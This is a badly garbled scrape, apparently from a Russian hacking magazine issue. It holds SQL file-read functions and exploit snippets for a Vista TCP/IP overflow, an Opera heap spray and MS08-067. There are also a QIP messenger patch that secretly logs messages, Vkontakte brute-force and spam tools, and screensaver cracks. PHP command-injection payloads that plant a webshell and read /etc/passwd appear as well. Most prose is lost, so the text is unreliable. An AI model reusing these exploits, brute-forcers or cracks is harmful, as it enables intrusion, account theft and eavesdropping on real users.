pg_read_file('bla.txt',n,m)
( n m )3. :
pg_ls_dir('/tmp')
4. :
pg_stat_file('users.txt')
, . :).
-
>>
: :, -- . , , , . , ( , host-based ips .). , Rnmap.1. NMAP
(rnmap.sourceforge.net).2. rnmap-adduser.py vasia.3. telnet
Grnmap.py . Nessus. - (t1shopper.com/tools/port-scanner). , , . ,
NMAP, - . z
RNMAP
8
x 01 /121/ 09 043
: http- SMtp-: HoSproxy HTTP over SMTP Proxy. : HoStunnel
HoSproxy. Windows. - HoStunnel , 25 (TCP SMTP). : - ( ), . HTTP- .
HoSproxy , HTTP-proxy (tcp 8080), -. HTTP- . , :1. HoSproxy
edge-security.com/hosproxy.php ( DVD).2. Hospoxy.cfg :
# SMTP- :
#smtp.myserver.com
local_smtp_server=
# (Y/N)
smtp-auth=N
[email protected]
smtp-pass=
#
(pop, imap, #imapssl, popssl)
mail_retrieve_protocol=pop
#
#pop3.myserver.com
mail_access_server=
#
[email protected]
#
mas_passwd=
#, WEB-
[email protected]
# HTTP-
[email protected]
3. hosproxy.exe .
7
Hostunnel
-
WindoWs ,
, , .
RPC dCoM,
MsBlast. , , ,
GiMMiv! KeRnelBot.dG, -
. !
>>
044 x 01 /121/ 09
Ms WindoWs
>> Brief 2008 Thomas Unterleitner phion AG (Marius
Wachtler, Michael Burgbacher, Carson Hounshell Michael Craggs)
TCP/IP- . Microsoft VISTA TCP/IP stack buffer overflow, . , TCP/IP-
. , ExAllocatePoolWithTag, 32 - ( API- CreateIpForwardEntry2,
iphlpapi.dll, 32-, 64- Windows Vista). MSDN, MIB_IPFORWARD_ROW2,
PrefixLength 32 ( ). , PrefixLength DWORD, memcpy. - . , shell-.
CreateIpForwardEntry2 - , , , , -, ( , ). 64- Windows , . , Service
Pack 1! 64- XP , -
MIB_IPFORWARD_ROW2. PrefixLength , Server 2003. , , ... , , . ,
,
, . , . - securityfocus.com/archive/1/498471.. >>
TargetsVista Home/Business/Enterprise/Ultimate x32/x64 SP0/SP1
>> Exploit exploit, - , Thomasa Unterleitnera
securityfocus.com/data/vulnerabilities/exploits/32357.c. . IP- ! -
. IP- .
explOIt, MIB_IPFORWARD_ROW2 route;
route.InterfaceIndex = atoi(argv[1]);
route.DestinationPrefix.PrefixLength = atoi(argv[2]);
route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr =
inet_addr('1.2.3.0');
route.NextHop.Ipv4.sin_addr.s_addr =
inet_addr("11.22.33.44");
route.Protocol = MIB_IPPROTO_NETMGMT;
route.Origin = NlroManual;
route.ValidLifetime = 0xffffffff;
route.PreferredLifetime = 0xffffffff;
route.Metric = 1;
CreateIpForwardEntry2(&route);
>> SolutionMicrosoft , , . , , , . .
MS WINDOWS
>> Brief , , support#killprog.com.
!
01
02
-
>>
045
API- UnhookWindowsHookEx ( ) ( API- SwitchDesktop) win32k.sys, -
. , API- ! . , ( ) - . , . exploit, support#killprog, , API-
Sleep(0) . exploit . , (, -) . - exploit , Windows .
murphy-law.net.ru securityfocus.com/bid/32206.
>> Targets: Server 2003 Standard/Enterprise/Datacenter
x32/x64 Vista Home/Premium/Ultimate x32/x64. -, , .
>> Exploit exploit, ,
securityfocus.com/data/vulnerabilities/exploits/whk.zip Microsoft
Visual C++ exe/dll ( ).
>> Solution ! , Microsoft , . - , -, ( -, ). , . Server
2003 USER32.DLL , UnhookWindowsHookEx SwitchDesktop .
OPERA
>> Brief , , . - ( ), , shell-. 2008 ( ~16,500 ) URL file.
Security Focus ( securityfocus.com/bid/32323) , HTML- exploit. , -
, offline, . , , - . , :).
>> Targets 9.6 9.62.
>> Exploit exploit, , milw0rm.com/exploits/7135, .
explOIt,
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape(%ue8fc%u4100);
while (block.length < 81920) block += block;
var memory = new Array();
for (;i Solution , - , . , .
MS WINDOWS RPC
>> Brief2 2008 ( ) 20- . , RPC. - Windows 2000 /Server
2008 - . 32-, 64-, - . Trojan-Spy:W32/Gimmiv.A/B/C,
W32/Conficker.worm, Trojan:Win32/Wecorl.A/B, Trojan:Win32/
Clort.A/!exploit/dr, TrojanDownloader:Win32/VB.CQ/CJ , , . exploit
, , . Microsoft , - , - ( ), ! Microsoft , ( , )., . , -:
microsoft.com/technet/security/Bulletin/ms08-067.mspx
securityfocus.com/bid/31874, http://blogs.technet.com/swi/
blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx.
>> Targets NT- : W2K Professional/
Server/Advanced/Datacenter SP0/SP1/SP2/SP3/SP4, XP
Gold/Home/Professional SP0/SP1/ SP2/SP3 x86/x86-64, Vista
03
exploit
04
x 01 /121/ 09
-
046
>>
x 01 /121/ 09
Home/Business/ Enterprise/ Ultimate SP0/SP1 x86/x86-64, S2K3
Standard/Datacenter/Advanced/Enterprise SP0/SP1/SP2 x86/x86-64/
Itanium, S2K8 Standard/Datacenter/Advanced/Enterprise SP0
x86/x86-64/ Itanium.
>> Exploits exploit , ... , , , (W2K, XP, S2K3). S2K8
exploit , , ! , :1. MS08-067 Remote Stack Overflow Vulnerability
Exploit by Polymorphours W2K, , : milw0rm.com/exploits/7104.2.
MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) W2K
S2K3[SP2], , : milw0rm.com/exploits/7132.3. MS08-067 Exploit for CN
by [email protected] -, XP, S2k3 . - , exploit, :
milw0rm.com/sploits/2008-MS08-067.rar.4. MS08-067 Gimmiv Worm.A (-
):
offensivecomputing.net/?q=ocsearch&ocq=d65df633dc2700d521ae4dff8c393bff
>> SolutionMicrosoft , - , (
microsoft.com/technet/security/Bulletin/ms08-067.mspx) , . 139 445
, -. - , , 5c 00 2e 00 2e 00 5c 00 (\..\), 2f 00 2e 00 2e 00 2f 00
(/..), 5c 00 2e 00 2e 00 2f 00 (\../) 5c 00 2e 00 2e 00 2f 00
(/..\). (kpnc.org/ftp/MS08-067.zip, 123456). RPC SRVSVC , ( ). ,
.
>> Disclose , /exploit. , , , ? ? -, , exploit . ,
Microsoft, . , - RPC , , ! , -. Microsoft , , . , , W2K S2k8. , -
W2K, - Windows2000-KB958644-x86-RUS.EXE, CAB-. - ? exe HIEW, MSCF.
.cab, Windows- compress.exe RAR, netapi32.
dll, . : XP , exe - , , . , . IDA-Pro - BinDiff PatchDiff, , :
http://cgi.tenablesecurity.com/tenable/patchdiff.php. netapi32.dll
netapi32_o.dll, IDA-Pro . , netapi32.dll (- netapi32_p.dll), ,
Edit\Plug-ins, PatchDiff netapi32_o.idb. , PatchDiff , 21 . , (
Graph). , - I_NetPathCanonicalize ( ). . 1. Jump to Code .
netapi32.dll 7CD1AA3E push 0 ; char
7CD1AA40 lea eax, [ebp+UncServerName]
7CD1AA46 push eax ; Dest
7CD1AA47 lea eax, [ebp+var_20]
7CD1AA4A push eax ; int
7CD1AA4B push [ebp+Buffer] ; Buffer
7CD1AA4E NetpIsRemote
netapi32.dll7CD1FB7D push 0 ; char
7CD1FB7F push 104h ; int
7CD1FB84 lea eax, [ebp+UncServerName]
Gimmiv.A, I_NetPathCanonicalize, \..\
-
047 x 01 /121/ 09
>>
7CD1FB8A push eax ; Dest
7CD1FB8B lea eax, [ebp+var_20]
7CD1FB8E push eax ; int
7CD1FB8F push [ebp+Buffer] ; Buffer
7CD1FB92 call NetpIsRemote
! NetpIsRemote(Buffer, int, Dest, char), NetpIsRemote(Buffer,
int, Dest, char, 0x104). , 0x104 , . -, . NetpwPathCanonicalize(),
sub_7CD1AB28, :
, 7CD1AB53 push [ebp+Source] ; Str
7CD1AB56 call edi ; __imp_wcslen
7CD1AB5B cmp eax, ebx
7CD1AB5D ja short loc_7CD1ABCF
7CD1AB5F push [ebp+Source] ; Source
7CD1AB68 push eax ; Dest
7CD1AB69 call ds:__imp_wcscat
7CD1AB8D lea eax, [ebp+Str]
7CD1AB93 push eax
7CD1AB94 call sub_7CD1ABD9
7CD1AB9D lea eax, [ebp+Str]
7CD1ABA3 push eax ; Str
7CD1ABA4 call edi ; __imp_wcslen
7CD1ABA6 lea eax, [eax+eax+2]
7CD1ABB4 lea eax, [ebp+Str]
7CD1ABBA push eax ; Source
7CD1ABBB push [ebp+Dest] ; Dest
7CD1ABBE call ds:__imp_wcscpy
wcslen()/wcscpy(). bug-free , , /, \ ., - \..\ - :
7CD1ABD9 sub_7CD1ABD9 proc near
; CODE XREF: sub_7CD1AB28+6C^p
7CD1ABD9
7CD1ABE0 mov edi, [esp+14h+arg_0]
7CD1ABE4 push '/'
7CD1ABE6 pop esi
7CD1ABE7 xor edx, edx
7CD1ABE9 mov ax, [edi]
7CD1ABEC push '\'
7CD1ABEE pop ebx
7CD1ABEF xor ebp, ebp
7CD1ABF1 cmp ax, bx
7CD1ABF4 mov [esp+14h+var_4], edx
7CD1ABF8 jz loc_7CD1EB17
7CD1ABFE cmp ax, si
7CD1AC01 jz loc_7CD1EB17
7CD1AC07 loc_7CD1AC07:
; CODE XREF: sub_7CD1ABD9+3F51v
7CD1AC07 test ax, ax
7CD1AC0A mov esi, edi
7CD1AC0C jz short loc_7CD1AC2B
7CD1AC0E loc_7CD1AC0E:
; CODE XREF: sub_7CD1ABD9+60vj
7CD1AC0E cmp ax, bx
7CD1AC11 jz loc_7CD273A8
7CD1AC17 cmp ax, '.'
7CD1AC1B jz loc_7CD273BB
, , - sub_7CD1ABD9() . - . exploit SRVSVC I_NetPathCanonicalize
I_NetPathCompare. , . , 4B324FC8-1670-01D3-1278-5A47BF6EE188:
I_NetPathType;
I_NetPathCompare;
I_NetNameValidate;
I_NetNameCompare;
I_NetListCanonicalize;
I_NetPathCanonicalize
I_NetNameCanonicalize;
I_NetServerSetServiceBits;
I_NetServerSetServiceBitsEx;
( ) \..\ - /../, /..\, \../ ( S2k3/S2k8). , . MSDN, - SRVSVC :
msdn.microsoft.com/en-us/library/cc213209.aspx. -
(hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html) . ! . ,
shell- . - JMP ESP/CALL ESP (FFE4h/FFD4h), netapi32.dll, . ,
Windows, . , . - , Metaspoit. DEP, , API-- VirtualAlloc
VirtualProtect, ( Google return2libc). exploit . . , / , shell-, -
. DVD. z
MS HIEW
-
-
, -
, ,
, .
,
, -
- QIP.
qip
x 01 /121/ 09
>>
048
Cr@wler
/ [email protected] /
Easyhack , - QIP , MessageBoxA. , , , , QIP . , . qip.exe , . ,
, - OllyDbg. , , QIP . . , - QIP , . , , : - nop . , . :). , - PE-
( , , ) -, . , : 068F4BA PE-
. , . :
0048023F . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00480242 . 807D FB 00 CMP BYTE PTR SS:[EBP-5],0
00480246 74 0F JE SHORT qip_modi.00480257
00480248 E8 B740F8FF CALL qip_modi.00404304
, - , . 00480246 . : . , , - CALL 00404304, ( , - Undo
Selection). nop . - , , Undo Selection, . , , ? . , . , - . , - - ,
, !
-
, , - - - . , - , , - .
warning
x 01 /121/ 09
>>
, EBX ( , , ; ) 0064ED7C. , , , -. , 0068F857. , 00480248, .
00480248 jmp 0068f857
, , 0048024D . :
0068F857 CMP EBX,0064ED7C ; -
ebx ,
0068F85D JNZ 0068F864 ; -
0064ED7C, ...
0068F85F JMP 0048024D ; ...
( qip.exe)
0068F864 PUSH 0048024D ;
...
0068F869 JMP 00404304 ; ...
, , ! , : - -.
, , - . ,
, API-: . MSDN, . CreateFileW. ( , ):
hTemplateFile -,
;
Attributes ;
Mode ;
pSecurity ;
ShareMode ;
Access ;
, ,
049
-
x 01 /121/ 09
>>
050
FileName .
( ). WriteFile. :
BOOL WINAPI WriteFile(
__in HANDLE hFile,
__in LPCVOID lpBuffer,
__in DWORD nNumberOfBytesToWrite,
__out_opt LPDWORD lpNumberOfBytesWritten,
__inout_opt LPOVERLAPPED lpOverlapped
);
:
hFile ;
Buffer , ;
nNumberOfBytesToRead ;
lpNumberOfBytesRead
;
lpOverlapped OVERLAPPED
().
, , 0068F86E. -. ( , , EASYHACK 2008 ), , , ( [ebp-8]) :
00649A01 CALL qip.004678B4
00649A06 CMP DWORD PTR SS:[EBP-8],0
00649A0A JE SHORT 0649A2F
, , CALL-, , ( cmp je). - , :
00649A01 CALL qip_modi.004678B4
00649A06 JMP 0068F86E
00649A0B NOP
? . 0068F86E - .1. CreateFileW -. API EAX .
0068F86E > 6A 00 PUSH 0 ; /hTemplateFile = NULL
0068F870 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
0068F875 . 6A 04 PUSH 4 ; |Mode = OPEN_ALWAYS
0068F877 . 6A 00 PUSH 0 ; |pSecurity = NULL
0068F879 . 6A 03 PUSH 3 ; |ShareMode = FILE_SHARE_
READ|FILE_SHARE_WRITE
0068F87B . 68 000000C0 PUSH C0000000 ; |Access =
GENERIC_READ|GENERIC_WRITE
0068F880 . 68 A7F86800 PUSH qip_modi.0068F8A7 ;
|FileName = "log.txt"
0068F885 . E8 D60E187C CALL kernel32.CreateFileW ;
\CreateFileW
2. EAX CloseHandle, .
0068F88A . 50 PUSH EAX ; /hObject
3. WriteFile . , , - API-: , . , 0068F8EB. , VirtualProtect
NewProtect = PAGE_EXECUTE_READWRITE. VirtualProtect 0068F8B7 (
PUSHAD). MOV , , 0068F8EB. :
; WriteFile :
0068F88B PUSH 0 ; |/pOverlapped = NULL
0068F88D PUSH EBP ; ||pBytesWritten
0068F88E PUSH 10 ; ||nBytesToWrite = 10 (16.)
0068F890 PUSH qip_modi.0068F8EB
; ||Buffer = qip_modi.0068F8EB
0068F895 PUSH EAX ; ||hFile
0068F896 CALL kernel32.WriteFile ; |\WriteFile
; CloseHandle ,
"PUSH EAX", -
0068F88A:
0068F89B CALL CloseHandle
; ,
VirtualProtect :
0068F8A0 POPAD
; qip.exe
0068F8A1 JMP qip_modi.00649A0B
; , CreateFileW:
0068F8A6 NOP
0068F8A7 UNICODE "log.txt",0
; :
0068F8B7 PUSHAD
; VirtualProtect
:
0068F8B8 PUSH 32F7D0
; /pOldProtect = 0032F7D0
0068F8BD PUSH 40
; |NewProtect = PAGE_EXECUTE_READWRITE
0068F8BF PUSH 0FF
; |Size = FF (255.)
0068F8C4 PUSH qip_modi.0068F8EB
; |Address = qip_modi.0068F8DD
0068F8C9 CALL kernel32.VirtualProtect
; \VirtualProtect
;
, 0068F8EB:
; 4 ...:
-
x 01 /121/ 09
>>
051
0068F8CE MOV ECX,DWORD PTR DS:[EBP-8]
0068F8D2 MOV EDX,DWORD PTR DS:[ECX]
0068F8D4 MOV ECX,qip_modi.0068F8EB
0068F8D9 MOV DWORD PTR DS:[ECX],EDX
;... 4 :
0068F8DB MOV ECX,DWORD PTR DS:[EBP-8]
0068F8DF MOV EDX,DWORD PTR DS:[ECX+4]
0068F8E2 MOV ECX,qip_modi.0068F8EF
0068F8E7 MOV DWORD PTR DS:[ECX],EDX
;
, -:
0068F8E9 JMP SHORT qip_modi.0068F86E
. :
00649A06 JMP 0068F86E
, - VirtualProtect, - . 0068F8E9 :
00649A06 JMP 0068F8B7
! , . VirtualProtect , . WriteFile, - , . , . , , .
, ! , --, . -, , , -. -, . , . , , QIP, - - . : -, QIP, , . (, )
. - , . . ! z
QIP . :)
-
BBS, , . , -
, .
.
. -
. , , .
, ? - -
. - - . , . , , . : - ? ? . , , . !
? , . , , , . :1. ( , : , , , , / ). , - . .2. ( ,
x 01 /121/ 09
>>
052
Balashek
-
). - , . .3. ( , , , ).4. (, , ). - . , , . , ( ) . . - .
/// , www.vkontakte.ru www.odnoklassniki.ru, - -. ///- . - ( ),
-. , , , . - Chaaka Vkontakte PM spamer. - , :). :
, [name]
[lastname]
Ajax
, - 777 : [name] . [lastname] .
[:] ( , , 1 ). cURL , -. , :). , Vkontakte.ru TOOLs Smapt. . - -
: 1 / 70 - 50 . , - vkontakte.ru bruteforce with multi-threads
C!klodoL. :1. ActivePerl .2. :
$dic = 'passl.txt'; #
$id = 111111; #id
$mail = 'mail%40mail.com'; #, @
%40
$threads = 4; #
3. .
x 01 /121/ 09
>>
053
-/ , - - - .
- - . !
info
-
4. good.txt . . Odnaklassniki cheker Vid0k, PHP. , ( DVD). , , -
(, , , -). , . ( ). , , . . ( ). :1. ID . .
http://vkontakte.ru/friend.php?id=. id= ID .2. : :
http://vkontakte.ru/photos.php?act=user&id=.:
http://vkontakte.ru/photos.php?id=.:
http://vkontakte.ru/video.php?id=.:
http://vkontakte.ru/notes.php?id=.
: http://vkontakte.ru/opinions.php?id=. , ! , , , ,
:http://vkontakte.ru/infested_ip_list.html. IP-, 100% ( -) DDoS
vkontakte.ru. The List of 17029 Infested IP Addresses:
121.0.133.32
121.0.134.65
121.0.134.70
121.0.135.1
121.0.135.124
121.0.135.14
121.0.135.34
12.107.192.164
121.100.111.216
121.100.96.91
121.11.132.44
121.11.174.93
121.11.182.39
121.11.183.185
121.11.185.147
121.124.193.6
121.125.101.160
121.125.205.51
121.125.241.60
, , IP - :). - :
http://vkontakte.ru/test.html
http://vkontakte.ru/admin.html
http://vkontakte.ru/captcha.php
http://vkontakte.ru/index.php?=PHPB8B5F2A0-
3C92-11d3-A3A9-4C7B08C10000
, , :). . z
! - ! , - !
warning
:)
IP DDoS
Vkontakte Tools
x 01 /121/ 09
>>
054
-
-
, . ,
, , ,
-
.
.
, ( , ). Win-
z, !. -, 3D- . - 3D- , Win-. 3D , Windows ( , ) WinApi . ,
SendMessage .3D 3D-, , , . , , , . , - ( , - ..). -
, . , - . , - , MD5, RSA , ( ) . , . ( , -) . , , . user mode
(OllyDbg, MS Dbg) 3D-.
, . 3D-, 3D-, , (OpenGL), (OpenGL) . : -
x 01 /121/ 09
>>
056
_a1!3N
-
_a1!3N
, ( , , , , , , ) -. , :
1. API-,
(glOrtho);
2. API-,
(glEnable(GL_BLEND), glBlendFunc(GL_SRC_ALPHA, GL_ONE_
MINUS_SRC_ALPHA), glColor4f...);
3. -
.
, . , - Screensaver download ! - :). , Windows , System32, *.scr
, ... !
OpenGl ElectriCalm 3D Screensaver. IDA ( , , , ). . -
PE Executable (*.scr *.exe). , , Imports. gl_ , OpenGL. glOrtho.
DATA XREF: , glOrtho. .
.data:0043A2CC glOrtho dd ? ; DATA XREF: sub_405350+44
, ( IDA sub_405350) 0x405350. ? - glOrtho, , N Rename
Call_Ortho. CODE XREF: , , , , Call_Ortho.
; CODE XREF: sub_403C10+E02
; sub_405110+2A
(sub_403C10+E02) - :
004049DC push 0BE2h ;.
004049E1 call glEnable ;glEnable(GL_BLEND);
x 01 /121/ 09
>>
057
-
004049E7 push 303h
004049EC push 302h ;. . (-
)
004049F1 call glBlendFunc ;glBlendFunc(GL_SRC_
ALPHA, GL_ONE_MINUS_SRC_ALPHA);
004049F7 mov ebx, [ebp-34h]
004049FA push ebx ; (-
)
004049FB push 0
004049FD push 0
004049FF push 0 ;.
. ALPHA
00404A01 call glColor4f ;glColor4f(RED,GREEN,BLUE
,ALPHA)
00404A07 push 0DE1h ;.
00404A0C call glDisable ;glDisable(GL_TEXTURE_2D)
00404A12 call Call_Ortho ;glOrtho... . .
00404A17 push 7 ;
00404A19 call glBegin ;glBegin(GL_QUADS)
, . , , , . - (glDisable(GL_TEXTURE_2D)) , . push 7 0x00404A17
push 0, glBegin(GL_POINTS). OpenGL , . glBegin . OpenGL, . OllyDbg,
- Hiew. Hiew ElectriCalm 3D Screensaver.scr , . 0x00404A17, , ,
PE-, . . (6A 07) - push 7. , 6A 00. . (, , OpenGL , ), - . ,
! -, , -. sub_405110 ( PrintStringLine), - , . , Call_Ortho, , ,
. ( , , , , ..). . . , ( NOP 0x90, push...) - (glBegin, glVertex).
glVertex3f x, y, z. - (, 0), 3D-: - . : glColor4f --, 0.0 1.0 :
004049F7 mov ebx, [ebp-34h] ; -
[ebp-34h] EBX
004049F7 xor ebx, ebx ;
EBX (EBX = 0) = 0
NOP. - -, -. ASSEMBLER, OllyDbg. :1. OllyDbg, ElectriCalm 3D
Screensaver.scr.2. 004049F7.3. , xor ebx, ebx. (OllyDbg NOP ).4.
Copy to executable All modifications.5. Copy all.6. Save file c- .
3D Formula 1 Screensaver. . glOrtho, , CallOrtho - , . Color4f
Vertex3f. , . , . : , , . , OpenGL,
x 01 /121/ 09
>>
058
OpenGL-
Hiew
-
(RenderFunc IDA) API- SwapBuffers glutSwapBuffers, -- glut, -
Windows - . SwapBuffers, . - , , ( , ). SwapBuffers :
extrn SwapBuffers:dword
; DATA XREF: sub_406320+281
; sub_417379+6FC
, . - :
00417A3F test ecx, ecx
00417A41 jnz short loc_417A54
; >
059
- - (, - - - , , - , NOP 0x90...):1. . - Windows 95.2. . . -.3.
., ., . OpenGL. -.
info
3D-
-
00403C44 call sub_401390
00403C49 mov eax, ds:dword_4A0854
00403C4E mov ecx, [eax]
00403C50 push eax
00403C51 call dword ptr [ecx+18h]
00403C54 mov edx, ds:dword_4A085C
00403C5A imul edx, 4CCh
00403C60 mov eax, ds:dword_49ACD4[edx]
00403C66 test eax, eax
00403C68 mov eax, ds:dword_4A0844
00403C6D jnz short loc_403C8B ;(3)
00403C6F mov ecx, [eax]
sub_401110, 0x00403C3D, -, API- (ExtTextOut, SetTextColor...), ,
UNREGISTERED VERSION!, Press the space bar to find out. -? , .
sub_401390 0x00403C44. Remaining time: %u sec.. -, . - , , Jnz (1)
; : 75 EB. Atlantis 3D Screensaver. , ( 0x0042414F). , -
( WinAPI) On_Idle ( 0x004241B3). RenderFunc. ... :
0042839A call dword ptr [eax+4Ch]
? , EAX. :
00428392 mov edx, [ebp+var_C] ; EDX -
var_C=ebp-0Ch
00428395 mov eax, [edx] ; EAX -
var_C, On_Idle:
004281CC mov [ebp+var_C], ecx ; -
[ebp+var_C] On_Idle
, ECX, -
, ..
, ECX.
004241AD mov ecx, [ebp+var_4C8] ; ECX
? :
00423EA4 mov [ebp+var_4C8], ecx ; -
[ebp+var_4C8] sub_423E9B
ECX (sub_423E9B) . , :
x 01 /121/ 09
>>
060
DirectX
-
0044C395 mov ecx, offset unk_56EF30 ; ECX
unk_56EF30
! , - , ASSEMBLER. , ECX , this ++, , , ( = (this+4Ch)). , , , ?
this=unk_56EF30 . , . OllyDbg, , 0x0056EF30 ( , Go to Expression,
0056EF30) 0x18744900. Intel ( ), 0x00497418, 0x00497418 + 0x4C =
0x00497464, , , 0x00454a87 . IDA: sub_454A87 , , . , , NOP. , . .
Call. -- , -, . ( ), , ! (0x00454B0C) (0x00454B08), . -, , , FPS. -
, . ! sub_428670 , 3 . . : -, , . - . , , , , ( ). IDA . -, . , ,
-, . , .
00429712 jz loc_429A91
, . :
004292C3 jz loc_429680
! Christmas Time 3D Screensaver . , On_iDle RenderFunc . . , , ,
, - . IDA, On_Idle. , 0x0041295F. , - , . , On_Idle inline-, - . ,
On_Idle , - RenderFunc. RenderFunc : Jcc 0x00413344. , , .
0x004132DC, 0x004132EE. , . Jcc 0x00413282, ! , - RenderFunc. .
sub_406C07 , , RenderFunc. sub_4091FA, 50 , , Bliss,
Lamp_off01.tga... - , 0x0040AA18.
?, , (- ) 3- -. , , - ( , ) , , , ASProtect. stripper. - 3D- , -
, - . : . , 3D-. z
x 01 /121/ 09
>>
061
IDA !
-
PHP-
WordPress, Joomla, Drupal, Moodle , , -
CMS, PHP. , -
-: kses, Snoopy SpellChecker
TinyMCE?
,
: XSS code exec. -
,
CMS.
x 01 /121/ 09
>>
062
/ icq 884888, http://wap-chat.ru /
code exec WYSIWYG- TinyMCE. TinyMCE , , , WordPress 2.0.x-2.7.x
./wp-includes/js/tinymce/plugins/spellchecker. : - Google, PHP-
PSpell, win- nix- aspell. config.php :
, , TinyMCE. , - $config[general.engine] = PSpellShell; . . RPC-
( 3 TinyMCE 2.5 - WordPress, POST GET-). lang
./wp-includes/js/tinymce/plugins/spellchecker/classes/
PSpellShell.php:
function _getCMD($lang) {
$this->_tmpfile = tempnam(
$this->_config['PSpellShell.tmp'], "tinyspell");
if(preg_match("#win#i", php_uname()))
return $this->_config['PSpellShell.aspell'] .
" -a --lang=". $lang . " --encoding=utf-8 -H < "
. $this->_tmpfile . " 2>&1";
-
x 01 /121/ 09
>>
063
return "cat ". $this->_tmpfile ." | " . $this->_
config['PSpellShell.aspell']
. " -a --encoding=utf-8 -H --lang=". $lang;
}
evil- JSON-. POST-, rpc.php, :
{"method":"getSuggestions","params":["en; _EVIL_-
"]}
, , :). .
, - , Snoopy PHP-, -. , , . (http://google.com/codesearch), -
WordPress, TikiWiki, Xoops , , . _httpsrequest():
function _httpsrequest($url,$URI,$http_method,
$content_type="",$body="")
{
...
$safer_URI = strtr( $URI, "\"", " " ); // strip
quotes from the URI to avoid shell access
exec($this->curl_path." -D \$headerfile\
"".$cmdline_params." \"".$safer_URI.""\
"",$results,$return);
...
}
WordPress escapeshellcmd. , ?1. evil- $URI, - ;2. evil- exec. ,
, , , - ? ! backticks ( ). - :
echo "'id'"
'id', -
id. , - XOOPS.
, xoops-1.3.10 ( ) :1. ./html/class/snoopy.class.php, -
_httpsrequest() fetch();2. ./class/phpsyndication.lib.php :
require(XOOPS_ROOT_PATH."/class/snoopy.class.php");
...
function getData($forcecache=false)
{
...
$snoopy = new Snoopy;
...
$snoopy->fetch($this->sourceUrl);
$data = $snoopy->results;
...
}
function getHtml($fromcache=false)
{
$data = $this->getData($fromcache);
...
function getTitle($fromcache=false)
{
$data = $this->getData($fromcache=false);
getTitle() getHtml();3.
./html/modules/headlines/blocks/headlines.php :
-
>>
064
wiki.moxiecode.com/index.php/TinyMCE:Plugins/spellchecker wiki
SpellChecker - TinyMCE.
securityfocus.com/bid/31887 Snoopy advisory.
snoopy.sourceforge.net Snoopy.
www.securityfocus.com/archive/1/414573 Advisory Xoops,
Snoopy.
xoops.ru - Xoops.
links
x 01 /121/ 09
, getTitle() getHtml(). :1. headlinesurl https://'echo ''
>> xox.php'
( headlines; , );2. XOOPS headlines URL;3. ,
http://victim.com/xoops-1.3.10/html/class/
xox.php?cmd='cat /etc/passwd'. , Snoopy , , , - . .
- kses (PHP- ).Kses , WordPress, Moodle, Drupal, eGroupware,
Dokeos, PHP-Nuke, Geeklog . code exec preg_replace /e:
function kses_bad_protocol_once($string,
$allowed_protocols){
return preg_replace('/^((&[^;]*;|[\sA-Za-z0-
9])*)'.
'(:|:|[Xx]3[Aa];)\s*/e', 'kses_bad_
protocol_once2("\\1", $allowed_protocols)',
$string);
}
(, phpinfo) kses_bad_protocol_once() - :
H4ck
, WordPress , , , wp_kses_normalize_entities() : & &
$string = str_replace('&', '&', $string);
WordPress , . - , . - , . , , Moodle. . :
$injection_points = array(
'blocks/rss_client/block_rss_client_error.
php' => array('error'),
'course/scales.php?id=1' => array('name',
'description'),
'help.php => array('text'),
'login/confirm.php' => array('data', 's'),
'mod/chat/gui_basic/index.php?id=1' =>
array('message'),
SpellChecker TinyMCE
-
>>
'mod/forum/post.php' => array('name'),
'mod/glossary/approve.php?id=1' => array('hook'),
'mod/wiki/admin.php' => array('page'),
- :
$value = '';
eval() :). code exec , XSS. - phpMyFaq , XSS kses . .
xSS kses javascript kses_bad_protocol_once2(). urldecode() %0B (
) %08 ( ). PoC ( ):
(Opera) lol
(Firefox) test
! kses style, kses XSS, CSS. :
(Firefox) test
. , , advisory , . z
Snoopy XSS WordPress kses
WP kses
065 x 01 /121/ 09
-
PE--
, Win32
. , -
, . ,
, / -
IDA Pro.
, , - Potable Executable (, , PE).
. , , (, ). , . ntoskrnl.exe, /-/. , , Windows ( wine) , , . ( )
crackme (kpnc.org/ftp/KedaH3.zip), (IDA Pro, OllyDbg, HIEW, etc). ,
- .
PE- , (raw) . , : , . (physical) (virtual). , , , PE-, - . ( ) ,
- , , / . , , (Virtual Size Physical Size) . , - , PE-. , 10h ,
100h, / 1000h. , , 10h . -
x 01 /121/ 09
>>
066
-
( , , PE- ). , , 10h , ... ? - , . . , 10h . -, . , . , IDA Pro
( 5.3 ), HIEW, DUMPBIN .
, , . . ( ), . . , , , , . , - . , ( W2K, S2K3 XP), - .no pain
no gain. : condom-principle: itd rather have one and not need it
that need it and not have one., condom , . , crack-me MessageBoxA.
HIEW , ; , HEX-mode () (Header), (Entry). ... ! , . , . , 401010h,
10h
.text, , .! HIEW ! - . : The input file contains non-empty TLS
(Thread Local Storage) callback table. However, IDA Pro couldnt
find the TLS callback procedures in the loaded code - TLS callback,
IDA Pro TLS callback . , , - .
KedaH3.exe ida Pro - Retn, .text:00401000 _text segment para
public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data,
fs:nothing, gs:nothing
.text:00401000 retn
.text:00401000
.text:00401001 dd 3 dup(?)
.text:0040100D db 3 dup(?)
.text:00401010 public start
.text:00401010 start dd 8 dup(?)
.text:00401010 _text ends
, , RET, , - . MessageBoxA? ? ! TLS Callback , , , . KedaH3.exe
, ... . , , , - , 100% . . ( , ), , , , .
x 01 /121/ 09
>>
067
KedaH3.exe 100%
HIEW
, IDA Pro KedaH3.exe
KedaH3.exe, ,
-
, KedaH3.exe ( ) , , Windows.
HIEW. , - HEX- . / , / HEX-. . ( , ?) , . , ( 401000h) - . - ,
(RETN) , HIEW . . , HIEW , , , . - crack-me HIEW . HIEW , ., , . ,
. , ENTER, Manual Load, Load File of New Format, . - , ! IDA Pro
5.2 -, 5.3, , , .
KedaH3.exe, ida Pro 5.3 00401010 public start
00401010 start proc near
00401010 dec eax
00401011 retn
00401011 start endp
00401011
00401012 loc_401012:
; CODE XREF: .text:00401049vj
00401012 push offset a_noPainNoGain_
; " .no pain no gain. "
00401017 push offset unk_403018
0040101C push 0
0040101E call ds:MessageBoxA
00401024 xor eax, eax
00401026 mov eax, [eax]
00401028 db 65h
